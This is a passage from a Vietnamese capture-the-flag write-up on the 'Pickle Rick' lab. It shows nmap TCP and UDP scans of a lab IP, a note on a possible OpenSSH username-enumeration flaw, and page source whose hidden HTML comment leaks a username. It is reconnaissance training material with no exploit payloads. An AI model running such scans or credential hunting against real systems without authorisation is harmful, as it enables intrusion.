<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;
mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600"
o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f"
stroked="f">
<v:stroke joinstyle="miter"/>
<v:formulas>
<v:f eqn="if lineDrawn pixelLineWidth 0"/>
<v:f eqn="sum @0 1 0"/>
<v:f eqn="sum 0 0 @1"/>
<v:f eqn="prod @2 1 2"/>
<v:f eqn="prod @3 21600 pixelWidth"/>
<v:f eqn="prod @3 21600 pixelHeight"/>
<v:f eqn="sum @0 0 1"/>
<v:f eqn="prod @6 1 2"/>
<v:f eqn="prod @7 21600 pixelWidth"/>
<v:f eqn="sum @8 21600 0"/>
<v:f eqn="prod @7 21600 pixelHeight"/>
<v:f eqn="sum @10 21600 0"/>
</v:formulas>
<v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_1" o:spid="_x0000_i1055" type="#_x0000_t75"
style='width:468pt;height:52.8pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img border=0 width=624 height=70
src="Khai%20thác%20Pickle%20Rick%20_files/image002.png" v:shapes="Picture_x0020_1"><![endif]></span><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin'><o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Ping
ki&#7875;m tra máy Kali có &#273;ang cùng m&#7841;ng v&#7899;i M&#7909;c tiêu
hay ko:<o:p></o:p></span></p>
<p class=MsoNormal align=center style='text-align:center'><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_5"
o:spid="_x0000_i1054" type="#_x0000_t75" alt="Text&#10;&#10;Description automatically generated"
style='width:343.2pt;height:93.6pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image003.png" o:title="Text&#10;&#10;Description automatically generated"/>
</v:shape><![endif]--><![if !vml]><img border=0 width=458 height=125
src="Khai%20thác%20Pickle%20Rick%20_files/image004.png"
alt="Text&#10;&#10;Description automatically generated" v:shapes="Picture_x0020_5"><![endif]></span><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin'><o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Th&#7921;c
hi&#7879;n scan các port TCP:<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;
color:red'>nmap -vv -Pn -T4 -sC -sV -O -p- 10.10.176.127<o:p></o:p></span></p>
<p class=MsoNormal align=center style='text-align:center'><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin;color:black;mso-themecolor:text1;mso-no-proof:yes'><!--[if gte vml 1]><v:shape
id="Picture_x0020_3" o:spid="_x0000_i1053" type="#_x0000_t75" style='width:467.4pt;
height:236.4pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img border=0 width=623 height=315
src="Khai%20thác%20Pickle%20Rick%20_files/image006.png" v:shapes="Picture_x0020_3"><![endif]></span><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin;color:black;mso-themecolor:text1'><o:p></o:p></span></p>
<p class=MsoNormal align=center style='text-align:center'><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin;color:black;mso-themecolor:text1;mso-no-proof:yes'><!--[if gte vml 1]><v:shape
id="Picture_x0020_4" o:spid="_x0000_i1052" type="#_x0000_t75" alt="Graphical user interface&#10;&#10;Description automatically generated"
style='width:468pt;height:188.4pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image007.png" o:title="Graphical user interface&#10;&#10;Description automatically generated"/>
</v:shape><![endif]--><![if !vml]><img border=0 width=624 height=251
src="Khai%20thác%20Pickle%20Rick%20_files/image008.png"
alt="Graphical user interface&#10;&#10;Description automatically generated"
v:shapes="Picture_x0020_4"><![endif]></span><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;
color:black;mso-themecolor:text1'><o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;
color:black;mso-themecolor:text1'>Th&#7921;c hi&#7879;n vi&#7879;c scan các
port UDP<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;
color:red'>nmap -vv -Pn -T4 -sU -sV 10.10.176.127<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;
color:black;mso-themecolor:text1;mso-no-proof:yes'><!--[if gte vml 1]><v:shape
id="Picture_x0020_8" o:spid="_x0000_i1051" type="#_x0000_t75" style='width:468pt;
height:224.4pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image009.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img border=0 width=624 height=299
src="Khai%20thác%20Pickle%20Rick%20_files/image010.png" v:shapes="Picture_x0020_8"><![endif]></span><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin;color:black;mso-themecolor:text1'><o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>D&#7921;a
trên k&#7871;t qu&#7843; quét các port TCP và phiên b&#7843;n nh&#432; trên, có
th&#7875; th&#7845;y Server &#273;ang m&#7903; 2 port 22 và 80. Trong &#273;ó
port 22 là service SSH v&#7899;i phiên b&#7843;n OpenSSH 7.2p2.<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Th&#7917;
truy c&#7853;p b&#7857;ng ssh &#273;ên server -&gt; nh&#432;ng th&#7845;t b&#7841;i<o:p></o:p></span></p>
<p class=MsoNormal align=center style='text-align:center'><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_6"
o:spid="_x0000_i1050" type="#_x0000_t75" alt="Text&#10;&#10;Description automatically generated"
style='width:424.8pt;height:96pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image011.png" o:title="Text&#10;&#10;Description automatically generated"/>
</v:shape><![endif]--><![if !vml]><img border=0 width=566 height=128
src="Khai%20thác%20Pickle%20Rick%20_files/image012.png"
alt="Text&#10;&#10;Description automatically generated" v:shapes="Picture_x0020_6"><![endif]></span><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin'><o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Tìm
l&#7895;i liên quan &#273;&#7871;n phiên b&#7843;n c&#7911;a SSH này<o:p></o:p></span></p>
<p class=MsoNormal align=center style='text-align:center'><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_7"
o:spid="_x0000_i1049" type="#_x0000_t75" alt="Text&#10;&#10;Description automatically generated"
style='width:425.4pt;height:153pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image013.png" o:title="Text&#10;&#10;Description automatically generated"/>
</v:shape><![endif]--><![if !vml]><img border=0 width=567 height=204
src="Khai%20thác%20Pickle%20Rick%20_files/image014.png"
alt="Text&#10;&#10;Description automatically generated" v:shapes="Picture_x0020_7"><![endif]></span><span
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
major-latin'><o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>D&#7921;a
vào k&#7871;t qu&#7843; tìm ki&#7871;m, r&#7845;t có th&#7875; Server dính l&#7895;
h&#7887;ng “Usename Enumeration”. Thông qua tìm hi&#7875;u thì l&#7895;i này
th&#432;&#7901;ng ch&#7841;y r&#7845;t m&#7845;t th&#7901;i gian &#273;&#7875;
tìm ra username cho SSH, sau &#273;ó l&#7841;i còn ph&#7843;i brute force tìm
password cho tài kho&#7843;n &#273;ó mà ch&#432;a ch&#7855;c s&#7869; tìm ra
&#273;&#432;&#7907;c -&gt; t&#7841;m th&#7901;i b&#7887; qua.<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Chuy&#7875;n
&#273;&#7871;n ti&#7871;p theo s&#7869; là port 80. Ti&#7871;n hành truy c&#7853;p
trang web theo &#273;&#7883;a ch&#7881; c&#7911;a Server, tìm source:<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;
mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_9" o:spid="_x0000_i1048"
type="#_x0000_t75" alt="Graphical user interface&#10;&#10;Description automatically generated with low confidence"
style='width:467.4pt;height:222pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image015.png" o:title="Graphical user interface&#10;&#10;Description automatically generated with low confidence"/>
</v:shape><![endif]--><![if !vml]><img border=0 width=623 height=296
src="Khai%20thác%20Pickle%20Rick%20_files/image016.png"
alt="Graphical user interface&#10;&#10;Description automatically generated with low confidence"
v:shapes="Picture_x0020_9"><![endif]></span><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>
src c&#7911;a nó s&#7869; là:<o:p></o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='text-align:justify'><!--[if gte vml 1]><v:rect id="Rectangle_x0020_12"
o:spid="_x0000_s1026" style='position:absolute;left:0;text-align:left;
margin-left:7.65pt;margin-top:-42.55pt;width:457.65pt;height:696pt;z-index:251659264;
visibility:visible;mso-wrap-style:square;mso-height-percent:0;
mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;
mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;
mso-position-horizontal-relative:text;mso-position-vertical:absolute;
mso-position-vertical-relative:text;mso-height-percent:0;
mso-height-relative:margin;v-text-anchor:middle' o:gfxdata="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
" filled="f" strokecolor="#1f3763 [1604]" strokeweight="1pt"/><![endif]--><![if !vml]><span
style='mso-ignore:vglayout'>
<table cellpadding=0 cellspacing=0 align=left>
<tr>
<td width=19 height=562></td>
</tr>
<tr>
<td></td>
<td width=770 height=1167 style='border:1.0pt solid #1F3763;vertical-align:
top'><![endif]><![if !mso]><span style='position:absolute;mso-ignore:vglayout;
left:0pt;z-index:251659264'>
<table cellpadding=0 cellspacing=0 width="100%">
<tr>
<td><![endif]>
<div v:shape="Rectangle_x0020_12" style='padding:4.6pt 8.2pt 4.6pt 8.2pt'
class=shape>
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
color:black;mso-themecolor:text1'>&lt;!DOCTYPE html&gt;<o:p></o:p></span></p>
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
color:black;mso-themecolor:text1'>&lt;html lang=&quot;en&quot;&gt;<o:p></o:p></span></p>
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
color:black;mso-themecolor:text1'>&lt;head&gt;<o:p></o:p></span></p>
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'> 
</span>&lt;title&gt;Rick is sup4r cool&lt;/title&gt;<o:p></o:p></span></p>
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'> 
</span>&lt;meta charset=&quot;utf-8&quot;&gt;<o:p></o:p></span></p>
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'> 
</span>&lt;meta name=&quot;viewport&quot; content=&quot;width=device-width,
initial-scale=1&quot;&gt;<o:p></o:p></span></p>
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'> 
</span>&lt;link rel=&quot;stylesheet&quot;
href=&quot;assets/bootstrap.min.css&quot;&gt;<o:p></o:p></span></p>
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'> 
</span>&lt;script src=&quot;assets/jquery.min.js&quot;&gt;&lt;/script&gt;<o:p></o:p></span></p>
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'> 
</span>&lt;script
src=&quot;assets/bootstrap.min.js&quot;&gt;&lt;/script&gt;<o:p></o:p></span></p>
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'> 
</span>&lt;style&gt;<o:p></o:p></span></p>
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'> 
</span>.jumbotron {<o:p></o:p></span></p>
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'>   
</span>background-image: url(&quot;assets/rickandmorty.jpeg&quot;);<o:p></o:p></span></p>
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'>   
</span>background-size: cover;<o:p></o:p></span></p>
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'>   
</span>height: 340px;<o:p></o:p></span></p>
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'>  </span>}<o:p></o:p></span></p>
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'> 
</span>&lt;/style&gt;<o:p></o:p></span></p>
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
color:black;mso-themecolor:text1'>&lt;/head&gt;<o:p></o:p></span></p>
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
color:black;mso-themecolor:text1'>&lt;body&gt;<o:p></o:p></span></p>
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'> 
</span>&lt;div class=&quot;container&quot;&gt;<o:p></o:p></span></p>
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'>   
</span>&lt;div class=&quot;jumbotron&quot;&gt;&lt;/div&gt;<o:p></o:p></span></p>
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'>   
</span>&lt;h1&gt;Help Morty!&lt;/h1&gt;&lt;/br&gt;<o:p></o:p></span></p>
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'>   
</span>&lt;p&gt;Listen Morty... I need your help, I've turned myself into a
pickle again and this time I can't change back!&lt;/p&gt;&lt;/br&gt;<o:p></o:p></span></p>
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'>   
</span>&lt;p&gt;I need you to &lt;b&gt;*BURRRP*&lt;/b&gt;....Morty, logon
to my computer and find the last three secret ingredients to finish my
pickle-reverse potion. The only problem is,<o:p></o:p></span></p>
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'>   
</span>I have no idea what the &lt;b&gt;*BURRRRRRRRP*&lt;/b&gt;, password
was! Help Morty, Help!&lt;/p&gt;&lt;/br&gt;<o:p></o:p></span></p>
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'> 
</span>&lt;/div&gt;<o:p></o:p></span></p>
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
color:#00B050'><span style='mso-spacerun:yes'>  </span>&lt;!--<o:p></o:p></span></p>
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
color:#00B050'><span style='mso-spacerun:yes'>    </span>Note to self,
remember username!<o:p></o:p></span></p>
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
color:#00B050'><span style='mso-spacerun:yes'>    </span>Username:
R1ckRul3s<o:p></o:p></span></p>
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
color:#00B050'><span style='mso-spacerun:yes'>  </span>--&gt;<o:p></o:p></span></p>
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
color:black;mso-themecolor:text1'>&lt;/body&gt;<o:p></o:p></span></p>
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
color:black;mso-themecolor:text1'>&lt;/html&gt;<o:p></o:p></span></p>
</div>
<![if !mso]></td>
</tr>
</table>
</span><![endif]><![if !mso & !vml]>&nbsp;<![endif]><![if !vml]></td>
</tr>
</table>
</span><![endif]><span style='font-size:13.0pt;line-height:107%;font-family:
"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;mso-hansi-theme-font:
major-latin;mso-bidi-theme-font:major-latin'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
